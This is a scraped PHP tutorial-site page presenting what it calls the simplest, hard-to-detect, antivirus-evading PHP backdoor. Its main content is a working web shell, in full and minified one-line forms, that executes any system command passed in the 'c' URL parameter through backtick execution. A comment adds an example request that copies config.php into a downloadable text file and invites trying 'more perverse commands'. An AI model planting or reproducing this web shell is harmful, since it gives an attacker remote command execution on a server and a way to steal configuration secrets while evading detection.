> php教程 > PHP源码 > 본문

PHP最简单的后门,且难查,不报毒!

PHP中文网
풀어 주다: 2016-05-23 16:40:09
원래의
2053명이 탐색했습니다.

php代码

<?php
 
$c=urldecode($_GET[&#39;c&#39;]);if($c){`$c`;}//完整
 
!$_GET[&#39;c&#39;]||`{$_GET[&#39;c&#39;]}`;//精简
 
/*******************************************************
 * 原理:PHP中``符号包含会当作系统命令执行
 * 示例:http://host/?c=type%20config.php>;config.txt
 *       然后就可以下载config.txt查看内容了!
 *       可以试试更变态的命令,不要干坏事哦!
 *******************************************************/
로그인 후 복사
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 추천
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿